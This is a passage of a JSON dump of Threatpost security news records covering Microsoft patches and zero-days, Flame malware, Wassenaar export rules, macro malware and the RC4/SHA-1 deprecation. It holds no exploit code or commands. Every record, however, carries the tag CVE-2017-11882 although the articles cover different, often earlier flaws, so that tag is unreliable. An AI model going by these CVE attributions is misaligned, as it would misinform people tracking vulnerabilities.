"2013-04-17T16:32:05", "id": "THREATPOST:E46805A1822D16B4725517D4B8786F57", "href": "https://threatpost.com/microsoft-fix-28-vulnerabilities-june-patch-tuesday-060712/76662/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:51", "description": "Microsoft is warning users about targeted attacks against a new vulnerability in several versions of Windows and Office that could allow an attacker to take over a user\u2019s machine. The bug, which is not yet patched, is being used as part of targeted attacks with malicious email attachments, mainly in the Middle East and Asia.\n\nIn the absence of a patch, Microsoft has released a FixIt tool for the vulnerability, which prevents exploits against the vulnerability from working. The bug affects Windows Vista, Windows Server 2008 and Microsoft Office 2003 through 2010.\n\n\u201cThe exploit requires user interaction as the attack is disguised as an email requesting potential targets to open a specially crafted Word attachment. If the attachment is opened or previewed, it attempts to exploit the vulnerability using a malformed graphics image embedded in the document. An attacker who successfully exploited the vulnerability could gain the same user rights as the logged on user,\u201d the Microsoft [advisory](<http://blogs.technet.com/b/msrc/archive/2013/11/05/microsoft-releases-security-advisory-2896666-v2.aspx>) says.\n\nThe vulnerability doesn\u2019t affect the current versions of Windows, the company said, and users who are running potentially vulnerable products can take a couple of actions in order to protect themselves. Installing the [FixIt tool](<http://technet.microsoft.com/en-us/security/advisory/2896666>) will help prevent exploitation, as will deploying the Enhanced Mitigation Experience Toolkit (EMET), which helps mitigate exploits against certain classes of bugs.\n\n\u201cThe vulnerability is a remote code execution vulnerability that exists in the way affected components handle specially crafted TIFF images. An attacker could exploit this vulnerability by convincing a user to preview or open a specially crafted email message, open a specially crafted file, or browse specially crafted web content. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights&lt;\u2018 Microsoft officials said.\n", "cvss3": {}, "published": "2013-11-05T14:07:32", "type": "threatpost", "title": "Microsoft Warns of Targeted Attacks on Windows 0-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-11-05T19:07:32", "id": "THREATPOST:DF45F7CBB6E670440E0A14E517EA753D", "href": "https://threatpost.com/microsoft-warns-of-targeted-attacks-on-windows-0-day/102821/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:57", "description": "**UPDATE \u2013 **In an unexpected turn, Microsoft\u2019s monthly Patch Tuesday security updates released today did not include patches for Internet Explorer vulnerabilities used during the Pwn2Own contest one month ago.\n\nThe popular hacker contest attracted researchers from all over who were targeting all the major browsers, as well as third-party software such as [Flash and Java](<https://threatpost.com/firefox-java-flash-all-taken-down-pwn2own-030713/>). Companies such as VUPEN and MWR Labs were able to beat locked-down versions of [IE 10 running on Windows 8](<https://threatpost.com/pwn2own-browser-exploits-getting-harder-more-expensive-find-030613/>) and Mozilla\u2019s Firefox browser, as well as Chrome running on Windows. Unlike Mozilla and Google, both of which [patched the flaws exploited during the contest within 24 hours](<https://threatpost.com/mozilla-and-google-patch-browser-flaws-used-pwn2own-030813/>), Microsoft had yet to update its browser. This has been compounded after last Thursday\u2019s advanced notification that indicated a cumulative IE update was coming today.\n\n\u201cThis puts them quite a bit behind other browsers that already patched their Pwn2Own bugs,\u201d said Andrew Storms, director of security operations at nCircle.\n\nA Microsoft representative, along with Qualys CTO Wolfgang Kandek, said the delay is likely due to regression testing and QA work necessary for patches.\n\n\u201cMicrosoft works with the security community to protect our customers against all threats and we are investigating possible issues identified by researchers during the Pwn2Own competition. We are not aware of any attacks and the issues should not affect our customers, as Pwn2Own organizers do not publicly disclose the competition\u2019s findings,\u201d said Dustin Childs, group manager, Microsoft Trustworthy Computing.\n\nToday\u2019s IE rollup addresses a pair of critical remote code execution flaws in versions 6-10 the browser. Both are use- after free vulnerabilities that exist in the way IE accesses objects in memory that have been deleted. \u201cThese vulnerabilities may corrupt memory in such a way that an attacker could execute arbitrary code in the context of a user,\u201d Microsoft said in its advisory [MS13-028](<https://technet.microsoft.com/en-us/security/bulletin/ms13-028>). Users would have to be lured to a website hosting an exploit via a phishing or spam email, Microsoft said.\n\n\u201cMS13-028 has a score of \u201c2\u201d in the Exploitability Index, indicating that the construction of an exploit for the vulnerability is not entirely straightforward and not expected within the next 30 days,\u201d Kandek said.\n\nThe IE update is one of nine bulletins released today addressing 14 vulnerabilities, a relatively light month compared to the 57 updates foisted upon users in February. One other bulletin was rated critical, another remote code execution vulnerability in Microsoft Remote Desktop Client. [MS13-029](<https://technet.microsoft.com/en-us/security/bulletin/ms13-029>) includes patches for Remote Desktop Connection 6.1 Client and Remote Desktop Connection 7.0 Client on Windows XP, Vista and Windows 7, as well as Windows Server 2003, 2008 and 2008 R2.\n\n\u201cA remote-code execution vulnerability exists when the Remote Desktop ActiveX control, mstscax.dll, attempts to access an object in memory that has been deleted. An attacker could exploit the vulnerability by convincing the user to visit a specially crafted webpage.\u201d Microsoft said in its alert. \u201cAn attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user.\u201d\n\nRoss Barrett, senior manager of security engineering at Rapid7 said that while versions 6.1 and 7 are vulnerable, version 8 is unaffected and is not yet the default.\n\n\u201cThis issue could be triggered through an RDP link in a browser or other content. A workaround would be to set the \u2018kill-bit\u2019 for these ActiveX controls, but the update actually fixes the issue, rather than disabling the RDP control,\u201d Barrett said.\n\nStorms said there are enough mitigating circumstances to make it less problematic for most businesses.\n\n\u201cThe bug does not affect the latest RDP client, version 8, which dramatically reduces the affected number of machines,\u201d Storms said. \u201cMicrosoft has released mitigation steps to disable the affected ActiveX control. Also, if your users browse with default IE settings, they will be presented with the \u2018gold bar\u2019 warning providing them with an opportunity to opt out of an attack.\u201d\n\nThe remaining seven bulletins are rated critical by Microsoft, a denial-of-service bug in Active Directory has caught experts\u2019 attention. [MS13-032](<https://technet.microsoft.com/en-us/security/bulletin/ms13-032>) could be triggered if an attacker sends a specially crafted query to the LDAP service that will consume CPU cycles and cause it to crash. The vulnerability affects Active Directory, Active Directory Application Mode (ADAM), Active Directory Lightweight Directory Service (AD LDS), and Active Directory Services on Microsoft Windows servers.\n\n\u201cIt should be high on the list for enterprise installations,\u201d Kandek said. \u201cAn attacker can shut down the domain controllers for an organization using only with a single workstation.\u201d\n\nAmong the remaining bulletins are privilege escalation vulnerabilities and an information disclosure bug:\n\n * [MS13-030](<https://technet.microsoft.com/en-us/security/bulletin/ms13-030>) is an information-disclosure vulnerability in SharePoint if an attacker knew the location of a SharePoint list and gained access with legitimate credentials.\n * [MS13-031](<https://technet.microsoft.com/en-us/security/bulletin/ms13-031>) is a privilege escalation flaw in the Windows Kernel. Exploits would require valid credentials in order to carry out an attack.\n * [MS13-033](<https://technet.microsoft.com/en-us/security/bulletin/ms13-033>) affects Windows Client/Server Runtime Subsystem in the way that the system handles objects in memory. Attackers would need valid credentials and local access to pull off an exploit.\n * [MS13-034](<http://technet.microsoft.com/en-us/security/bulletin/ms13-034>) is another privilege escalation bug, this time in Windows Defender, the Microsoft antimalware client. Successful exploits could enable an attacker to run code on an infected machine, view, change or delete data or create new accounts.\n * [MS13-035](<https://technet.microsoft.com/en-us/security/bulletin/ms13-035>) repairs a vulnerability in Microsoft HTML Sanitization Component found in Microsoft Office. An attacker would have to send a malicious Office document to pull off an attack.\n * [MS13-036](<https://technet.microsoft.com/en-us/security/bulletin/ms13-036>) patches three vulnerabilities in Kernel Mode Driver that elevates privileges for an attacker, who must have valid credentials and local access to exploit the flaws.\n\n_This article was updated to include a comment from Microsoft._\n", "cvss3": {}, "published": "2013-04-09T19:18:19", "type": "threatpost", "title": "Pwn2Own IE Vulnerabilities Missing from Microsoft Patch Tuesday Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-18T18:36:16", "id": "THREATPOST:5C60BA94DEDFC24233F8B820C7D23076", "href": "https://threatpost.com/pwn2own-ie-vulnerabilities-missing-microsoft-patch-tuesday-updates-040913/77712/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:12", "description": "A [suspicious Windows 7 update](<https://answers.microsoft.com/en-us/windows/forum/windows_7-update/windows-7-update-appears-to-be-compromised/e96a0834-a9e9-4f03-a187-bef8ee62725e?auth=1>) today raised concern on a number of Microsoft and technology forums that the Windows Update service had been compromised. Microsoft, however, cleared the air several hours later admitting that the update was their mistake.\n\n\u201cWe incorrectly published a test update and are in the process of removing it,\u201d said a Microsoft spokesperson\n\nA compromise of such an automated update service would have had devastating results. Automated software update services have long been speculated as a means to spread malware at scale. Attackers or governments that infiltrate something like Windows Update could compromise software updates to the point where such services are no longer trusted, leaving endpoints and servers unpatched and at greater risk.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2015/09/07002408/accidental-windows-update.jpeg>)\n\nRated important, the mysterious update, purportedly a new language pack, showed up early this morning on home and business users\u2019 machines. The update was 4.3 MB in size and included long, random character file names and redirects to different .mil, .gov and .edu domains\u2014both of which were out of the norm for Windows updates.\n\nThe update has since disappeared from Windows Update, but not before it was pushed mostly to consumers via Windows Update. Some users said the update to install on their machines. Others who successfully installed the update essentially bricked their machines, according to replies on the original Windows 7 forum post.\n\nWindows Update and Windows Server Update Services (WSUS) are especially juicy targets. At Black Hat this summer, researchers Paul Stone and Alex Chapman of Context Information Security of the U.K. demonstrated [weaknesses in WSUS](<https://threatpost.com/manipulating-wsus-to-own-enterprises/114168/>) that are difficult to address and expose any server or desktop using its automated updates to compromise.\n\nJust last week, the _[Washington Post](<https://www.washingtonpost.com/world/national-security/obama-administration-ponders-how-to-seek-access-to-encrypted-data/2015/09/23/107a811c-5b22-11e5-b38e-06883aacba64_story.html>) _reported that the U.S. government explored several approaches that technology providers could implement to cure the [Going Dark crypto issue](<https://threatpost.com/feasible-going-dark-crypto-solution-nowhere-to-be-found/114150/>). Law enforcement and government officials have expressed concern over recent changes from Apple and Google, in particular, to divorce themselves from storing encryption keys. The practice, government says, hinders law enforcement and national security investigations. They suggest, according to the _Post _article, that under a court order, the government could drop spyware on machines via software update services.\n\nAt TrustyCon, a 2014 event adjunct to RSA Conference, ACLU principal technologist Chris Soghoian delivered a talk that also suggested the next wave of [surveillance efforts could target update services](<https://threatpost.com/are-automated-update-services-the-next-surveillance-frontier/104558/>).\n\nSoghoian said his concern is that the government will not only exploit the convenience of these update services offered by most large providers, but also that it will erode the trust users have in the services leaving them vulnerable to cybercrime, identity theft and fraud.\n\n\u201cThere are really sound security reasons why we want automatic security updates. If consumers have to do work to get updates, they won\u2019t, and they will stay vulnerable,\u201d Soghoian said in 2014. \u201cWhat that means though is giving companies root on our computers\u2014and we really don\u2019t know what\u2019s in the code after fact. This is a point of leverage the government can use. We have no evidence they are using it right now, but these companies have a position of power over our devices that is unparalleled.\u201d\n", "cvss3": {}, "published": "2015-09-30T15:22:01", "type": "threatpost", "title": "Mystery Windows 7 Update An Accidental Test Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-10-02T16:00:39", "id": "THREATPOST:A45F038EA4091EC6AC414522EC7B04B6", "href": "https://threatpost.com/suspicious-windows-7-update-actually-an-accidental-microsoft-test-update/114860/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:58", "description": "Microsoft has issued a security advisory for a[ recently disclosed vulnerability ](<https://threatpost.com/microsoft-issues-advisory-aspnet-hole-092010/'s+Most+Popular>)in the ASP.NET that could leave millions of Web pages vulnerable to attack. \n\nThe company on Friday[ released Security Advisory 2416728 ](<http://blogs.technet.com/b/msrc/archive/2010/09/17/security-advisory-2416728-released.aspx>)addressing the ASP.NET security hole, which was first disclosed by researchers at the annual ekoparty hacking conference in Buenos Aires, Argentina on Friday. Microsoft said the company is not aware of any attacks leveraging the hole, which concerns ASP.NET implementation of the AES encryption algorithm to protect the integrity of Web session cookies that can store sensitive information. However, it provided steps to safeguard vulnerable ASP.Net applications from attacks. \n\nMicrosoft said it is continuing to investigate the issue and is working with other security companies in the Microsoft Active Protections Program (MAPP) to build protections against attacks that try to leverage the ASP.NET vulnerability. Microsoft also chided researchers for revealing the hole at a public hacking conference rather than working with the company to develop a patch first. \n\n\u201cWe believe public disclosure before a comprehensive update can be produced only leads to customer risk through criminal activity,\u201d Microsoft said in its advisory.\n\nOn Friday, researchers Juliano Rizzo and Thai Duong[ demonstrated the technique they developed for stealing cryptographic keys for ASP.NET Web applications ](<https://threatpost.com/demo-aspnet-padding-oracle-attack-091710/>)using a tool called the Padding Oracle Exploit Tool.\n\nIn a[ blog post accompanying the advisory](<http://blogs.technet.com/b/srd/archive/2010/09/17/understanding-the-asp-net-vulnerability.aspx>), Microsoft said the impact of the vulnerability will vary depending on the ASP.Net application that is being targeted, but that applications using ASP.Net 3.5 SP1 or above could be made to divulge the contents of \u201can arbitrary file\u201d using the Padding Oracle attack, exposing passwords, database connection strings or other sensitive data, Microsoft said.. \n\nA workaround provided by the company suggests using ASP.NET\u2019s customErrors feature to return the same error page regardless of the error encountered on the server, thus denying attackers the information needed to deduce the cipher text. Some ASP.NET may be configured to return the same message for all errors. Microsoft provided a script to detect ASP.NET applications that were not configured to do so. \n\nThe company promised to release more information as it became available and as it worked towards a permanent fix for the ASP.NET hole. \n", "cvss3": {}, "published": "2010-09-20T11:09:53", "type": "threatpost", "title": "Microsoft issues Advisory on ASP.NET Hole", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:02", "id": "THREATPOST:D292185F5E299FDB7366DDAA750D6070", "href": "https://threatpost.com/microsoft-issues-advisory-aspnet-hole-092010/74488/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:53", "description": "The attackers behind Flame can easily clean up compromised computers, according to research by security firm Symantec who found that some attackers have been able to use command-and-control (C&amp;C) servers to completely remove the malware from certain machines.\n\nAccording to a post on [Symantec\u2019s Security Response blog](<https://threatpost.com/attackers-can-use-self-destruct-feature-kill-flame-060812/>) yesterday, C&amp;C servers can send a file to infected computers to \u201cuninstall\u201d the Flame malware. The file, Browse32.ocx, then goes on to search the infected computer for every file used by Flame, removes them and even overwrite the disk with random bits of information and characters to cover its tracks.\n\nAccording to Symantec\u2019s analysis, the module contains two different exports: EnableBrowser, which initializes the module and StartBrowse, which does the actual deletion of the Flame files. Symantec also adds that the module appears to have been created on May 9 and looks similar to SUICIDE, an older module previously found in Flame\u2019s code.\n\nFlame was discovered and recent months and [disclosed by the Iranian government and western firms last week](<https://threatpost.com/whats-meaning-flame-malware-052912/>). The worm quickly drew comparisons to Stuxnet and Duqu. While the malware has apparently existed for years, it wasn\u2019t until this week that it was revealed the attackers [used a collision attack](<https://threatpost.com/microsoft-details-flame-hash-collision-attack-060612/>) to get the malware to [exploit a fraudulent certificate](<https://threatpost.com/flame-malware-uses-forged-microsoft-certificate-validate-components-060412/>) from Microsoft to attack Windows systems.\n", "cvss3": {}, "published": "2012-06-08T17:32:37", "type": "threatpost", "title": "Attackers Can Use 'Self-Destruct' Feature to Kill Flame", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:05", "id": "THREATPOST:6E2DD8B76555337B1AB3A01AE147EA68", "href": "https://threatpost.com/attackers-can-use-self-destruct-feature-kill-flame-060812/76669/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:31", "description": "The commenting period regarding the [Wassenaar Arrangement](<https://threatpost.com/head-scratching-begins-on-proposed-wassenaar-export-control-rules/112959>) expired on Monday but the echo chamber around the largely maligned proposal continues to reverberate. Several stakeholders implicated in the proposal added their voices to that chamber on Friday morning, urging the government to revise particulars of the proposal that they believe will ultimately constrain security research and severely hamper day-to-day operations at multiple security firms.\n\nLegal representatives from Microsoft, FireEye, Symantec, and security experts from other companies discussed the arrangement Friday morning during a panel, \u201cDecoding the BIS Proposed Rule for Intrusion Software Platforms,\u201d at the Center for Strategic &amp; International Studies in Washington.\n\nCristin Goodwin, a senior attorney for Microsoft, warned that in its current incarnation the Commerce Department\u2019s implementation of Wassenaar would bring research at the company, most of which follows the sun\u2013going country to country in real time\u2013to a screeching halt.\n\nGoodwin claimed the rules don\u2019t make sense for companies who do this kind of work regularly, pointing out that they\u2019d especially impede the reverse engineering of malware, something researchers at Microsoft do daily, Goodwin claimed.\n\n\u201cTo be able to understand [malware] \u2014 what it is, what it does, you\u2019d have to go get a license. How do you define or describe this category? If you\u2019re looking to articulate what this is, you\u2019re bringing into scope the everyday activities of security companies here,\u201d Goodwin said.\n\nUnder the Wassenaar proposal, brought forth by the U.S. Department of Commerce\u2019s Bureau of Industry and Security (BIS) back in May, the export of what BIS refers to as intrusion software would be tightened. For many companies, to carry out certain research activities, they\u2019d be forced to request export licenses, something that many security officials believe would work against the idea of information sharing.\n\nThe issue has been a largely one-sided one. Vagaries in the rule\u2019s wording have many believing that under Wassenaar, export control authorities, not vulnerability researchers, will dictate the tempo of legitimate research and exploit development. As it stands, the rules, already adopted by the EU, aim to curb intrusion software like FinFisher and Hacking Team\u2019s Remote Control System.\n\nOfficials at Google [called out the arrangement on Monday](<https://threatpost.com/google-calls-proposed-u-s-wassenaar-rules-not-feasible/113865>), insisting the rules aren\u2019t feasible and would have a \u201csignificant negative impact\u201d on security research, possibly requiring the company to request thousands or tens of thousands of export licenses for its research.\n\nLaura Galante, the director of threat intelligence at FireEye, echoed those sentiments Friday morning, saying that like Google, her company\u2019s research team would have to file for tens of thousands of licenses and that they\u2019d likely also be working against the presumption of denial, something that could eventually breed a defeatist \u201cdon\u2019t bother\u201d mentality.\n\nKatie Moussouris, chief policy officer at HackerOne, was one of the first to [publish her feelings](<https://threatpost.com/security-researchers-sound-off-on-proposed-us-wassenaar-rules/113023>) on the proposed rules. On Friday, she described to the panel how companies that specialize in cybersecurity defense would be more harmed by Wassenaar than those who cater to offense. Moussouris described how Microsoft, her former employer \u2013 and [bug bounty companies](<https://threatpost.com/bug-bounties-in-crosshairs-of-proposed-us-wassenaar-rules/113204>) like HackerOne \u2013 have benefited from bounty programs that wouldn\u2019t have been able to flourish under the proposed agreement. Specifically Moussouris referenced the success of Microsoft\u2019s Mitigation Bypass Bounty program.\n\n\u201cThe reason why that bounty program exists is because the only other way that a company like Microsoft can learn about new exploitation techniques was through actual attacks. Providing a defensive incentive to bring those forward earlier gives Microsoft a head start in defense,\u201d Moussouris said. \u201cThat program was launched a few months before Wassenaar added those rules.\u201d\n\n\u201cMicrosoft has awarded that bounty five times in the past two years. That\u2019s five times that Microsoft has gained access to technology that\u2019s regulated in this proposal and five times that Microsoft would have not had access to that information to build a more secure operating system,\u201d Moussouris said. \u201cThis is a concrete example of how this regulation impacts defense.\u201d\n\n> .[@msftsecurity](<https://twitter.com/msftsecurity>)'s bug bounty program implemented in the last 2 yrs wouldn't have happened under the proposed rule \u2013 [@k8em0](<https://twitter.com/k8em0>) [#CSISLive](<https://twitter.com/hashtag/CSISLive?src=hash>)\n> \n> \u2014 CSIS Cyber Feed (@CyberCSIS) [July 24, 2015](<https://twitter.com/CyberCSIS/status/624575567761940480>)\n\nIn the end, rules may actually prove fruitless, Stewart Baker, a partner at Steptoe &amp; Johnson LLP, said during the panel. Baker remarked that many of the more serious and restrictive Wassenaar rules date back to the Cold War, and admitted that relying on criminal prosecution might be a better move.\n\n> Relying on criminal prosecution may be a more effective method in achieving what we want than regulation \u2013 [@stewartbaker](<https://twitter.com/stewartbaker>) [#CSISLive](<https://twitter.com/hashtag/CSISLive?src=hash>)\n> \n> \u2014 CSIS Cyber Feed (@CyberCSIS) [July 24, 2015](<https://twitter.com/CyberCSIS/status/624587322311471105>)\n\n\u201cNo export control regime is going to have any impact on the bad guys, they already have the tools,\u201d Baker said.\n\n\u201cWhat we\u2019re looking at here is the U.S. taking unilateral control of its tech industry,\u201d Baker said.\n", "cvss3": {}, "published": "2015-07-24T13:29:14", "type": "threatpost", "title": "Stakeholders Argue Against Restrictive Wassennaar Proposal", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-07-30T14:08:12", "id": "THREATPOST:A844D1411E7339911EECDDBD5596A9E7", "href": "https://threatpost.com/stakeholders-argue-against-restrictive-wassennaar-proposal/113941/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:54", "description": "Researchers came across a malicious Word document last week that doesn\u2019t discriminate between OS platforms. The malicious Word document is designed to spread malware on either Mac OS X or Microsoft Windows, depending on where it\u2019s opened.\n\nLike many other strains of malware these days, the sample, which researchers at [Fortinet observed](<http://blog.fortinet.com/2017/03/22/microsoft-word-file-spreads-malware-targeting-both-apple-mac-os-x-and-microsoft-windows>) on March 16, relies on tricking users into enabling macros.\n\nOnce opened and macros are enabled, malicious VBA, or Visual Basic for Applications, code is executed, which runs the AutoOpen() macro. The macro goes on to read a base64-encoded string in the file, which depending on the operating system, executes a certain script.\n\nFor victims running Mac OS X, the script, is fairly straightforward. It downloads a malicious file containing another script, written in python, that\u2019s executed and attempts to communicate with the attacker\u2019s server. The downloaded script is a modded version of a Python meterpreter file, researchers say.\n\nMeterpreter, part of the Metasploit framework, is extensible payload component that uses in-memory DLL injection stagers. The tool has been adopted by several groups of late, including [GCMAN](<https://threatpost.com/spree-of-bank-robberies-show-cybercriminals-borrowing-from-apt-attacks/116173/>) and a group of attackers who have been spotted carrying out [fileless malware](<https://threatpost.com/fileless-memory-based-malware-plagues-140-banks-enterprises/123652/>)-based attacks.\n\nThe script that triggers the exploit on Windows is a little more involved. Like a Russian nesting doll, one layer of base64-encoded data spawns a powershell script, which decompresses another layer of base-64-encoded code which leads to another powershell script. Once executed, the script finally downloads a 64-bit DLL file, which executes and communicates with the attacker\u2019s server. Researchers with Fortinet believe the Windows side of the malware only affects 64-bit versions of Windows.\n\nWhile they have a pretty good idea of how the malware spreads, researchers aren\u2019t completely sure what the attackers behind it were after. Peixue Li, senior manager of FortiGuard Service Development and Security Research told Threatpost Thursday that when they observed TCP sessions to the attacker\u2019s server \u2013 both Windows and Apple \u2013 the server wasn\u2019t answering. Instead, Wireshark just gave them a TCP retransmission error message.\n\nMacro malware that explicitly targets macOS isn\u2019t necessarily new \u2013 but it has been a recent development. Researchers with Synack came across macro malware that executes solely on Mac machines [back in February](<https://threatpost.com/macro-malware-comes-to-macos/123640/>).\n\nThat malware, peddled by a group whose IP traces back to Russia, operated in a similar fashion. The victim would have to agree to enable macros for a Word document on the Mac version of Word. After enabled, a macro decodes data, and like the malware Fortinet researchers found, executes it in Python. The malware Synack found relies on leveraging a legitimate python post-exploitation OS X and Linux agent, EmPyre.\n\nFortinet\u2019s researchers claim they\u2019re still analyzing the malware, but Li says the fact that the malware\u2019s Python post-exploitation agent is different than the one used by the malware seen by Synack separates it from a pack.\n\n\u201cThe malware we analyzed targets both Mac OS and Windows\u2026 the Python post-exploitation agent used by the malware is different. One is EmPyre, the other is Meterpreter, Li said, \u201cCross-platform Macro-based malware could become a trend, perhaps.\u201d\n", "cvss3": {}, "published": "2017-03-23T15:21:43", "type": "threatpost", "title": "Malware That Targets Both Microsoft, Apple Operating Systems Found", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-03-29T18:55:25", "id": "THREATPOST:C442C6ABA3916CAA62C89BC2CB6332CD", "href": "https://threatpost.com/malware-that-targets-both-microsoft-apple-operating-systems-found/124531/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:49", "description": "The [RC4](<http://threatpost.com/attack-exploits-weakness-rc4-cipher-decrypt-user-sessions-031413/77628>) and SHA-1 algorithms have taken a lot of hits in recent years, with new attacks popping up on a regular basis. Many security experts and cryptographers have been recommending that vendors begin phasing the two out, and Microsoft on Tuesday said that is now recommending to developers that they deprecate RC4 and stop using the SHA-1 hash algorithm.\n\nRC4 is among the older stream cipher suites in use today, and there have been a number of practical attacks against it, including plaintext-recovery attacks. The improvements in computing power have made many of these attacks more feasible for attackers, and so Microsoft is telling developers to drop RC4 from their applications.\n\n\u201cIn light of recent research into practical attacks on biases in the RC4 stream cipher, Microsoft is recommending that customers enable TLS1.2 in their services and take steps to retire and deprecate RC4 as used in their TLS implementations. Microsoft recommends TLS1.2 with AES-GCM as a more secure alternative which will provide similar performance,\u201d Microsoft\u2019s William Peteroy said in a [blog post](<https://blogs.technet.com/b/srd/archive/2013/11/12/security-advisory-2868725-recommendation-to-disable-rc4.aspx?Redirected=true>).\n\n\u201cOne of the first steps in evaluating the customer impact of new security research and understanding the risks involved has to do with evaluating the state of public and customer environments. Using a sample size of five million sites, we found that 58% of sites do not use RC4, while approximately 43% do. Of the 43% that utilize RC4, only 3.9% require its use. Therefore disabling RC4 by default has the potential to decrease the use of RC4 by over almost forty percent.\u201d\n\nThe software company also is recommending that certificate authorities and others stop using the SHA-1 algorithm. Microsoft cited the existence of known collision attacks against SHA-1 as the main reason for advising against its use. Also, after January 2016, Microsoft developers can no longer use SHA-1 in code-signing or developer certificates.\n\n_Image from Flickr photos of [Josh Bancroft](<http://www.flickr.com/photos/joshb/>). _\n", "cvss3": {}, "published": "2013-11-12T16:07:39", "type": "threatpost", "title": "Microsoft Warns Customers Away From RC4, SHA-1", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-11-14T18:14:04", "id": "THREATPOST:E7C5C8276111C637456F053327590E4C", "href": "https://threatpost.com/microsoft-warns-customers-away-from-sha-1-and-rc4/102902/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:04", "description": "[](<https://threatpost.com/serious-new-flaw-found-iis-60-051809/>)\n\nA new remotely-exploitable vulnerability has been found in the Microsoft IIS 6.0 Web server. The flaw is quite similar to one that was discovered eight years ago in earlier versions of IIS, and exploitation of the weakness could enable an attacker to upload content to the vulnerable server.\n\nThe vulnerability is in the implementation of the WebDAV protocol in IIS 6.0, which allows remote users to access and modify documents on a Web server. News of the vulnerability, discovered by a researcher named Nikolaos Rangos, hit the [Full Disclosure security mailing list](<http://seclists.org/fulldisclosure/2009/May/att-0134/IIS_Advisory_pdf>) last week. Here are the details, from Rangos\u2019s advisory:\n\nThis vulnerability allows remote attackers to bypass access restrictions on vulnerable installations of Internet Information Server 6.0. The specific flaw exists within the WebDAV functionality of IIS 6.0. The Web Server fails to properly handle unicode tokens when parsing the URI and sending back data. Exploitation of this issue can \nresult in the following: \n\u2013 Authentication bypass of password protected folders \n\u2013 Listing, downloading and uploading of files into a password protected WebDAV folder\n\nThere is no patch available for this vulnerability, so experts at the SANS Internet Storm Center are recommending that people disable WebDAV in the interim. Thierry Zoller has a good analysis of the [IIS 6.0 vulnerability](<http://blog.zoller.lu/2009/05/iis-6-webdac-auth-bypass-and-data.html>) as well.\n\nMicrosoft\u2019s Security Response Center is investigating the WebDAV vulnerability and is in the process of putting together an advisory on it.\n\n\u201cMicrosoft is investigating new public claims of a possible vulnerability in Internet Information Services. We\u2019re currently unaware of any attacks trying to use the claimed vulnerability or of customer impact. We are working on a security advisory to provide customers with guidance to help protect themselves,\u201d said Christopher Budd, security response communications lead at Microsoft.\n", "cvss3": {}, "published": "2009-05-18T15:36:07", "type": "threatpost", "title": "Serious new flaw found in IIS 6.0", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:13", "id": "THREATPOST:7957677E374E9980D5154F756D4A2E00", "href": "https://threatpost.com/serious-new-flaw-found-iis-60-051809/72672/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:47", "description": "Do you find e-mail pleas for help from the widow of Democratic Republic of the Congo strongman Mobutu Sese Seko unconvincing or downright silly? That may be the point, according to Microsoft researcher Cormac Herley.\n\nThe outlandish claims of Nigerian Letter \u2013 or \u201c419\u201d \u2013 scams serve a critical purpose: separating the skeptics from the suckers. That\u2019s the conclusion of a new [paper published by Microsoft Research](<http://research.microsoft.com/apps/pubs/default.aspx?id=167712>) and scheduled to be presented on June 25th at the Workshop on the Economics of Information Security (WEIS) 2012 Conference in Berlin, Germany.\n\n\n\nThe paper, \u201c[Why do Nigerian Scammers Say They are from Nigeria?](<http://research.microsoft.com/pubs/167712/WhyFromNigeria.pdf>)\u201d (PDF) by researcher Cormac Herley analyzes the methods that online scammers use to navigate around a common problem in any detection program: false positives.\n\nIn the context of online scams, a \u201cfalse positive\u201d is any individual who is attacked, but yields nothing to the attacker.\n\nAs the density of potential victims decreases, Herley observes, the share of them that can be profitably attacked plummets. That leaves scammers in a Catch-22: only by targeting large numbers of potential victims can scammers find enough viable targets to make a profit. But the incremental cost of running 419 scams makes it unprofitable to target a large number of potential victims. That is, unless the attackers have an easy (and cheap) way to distinguish between the 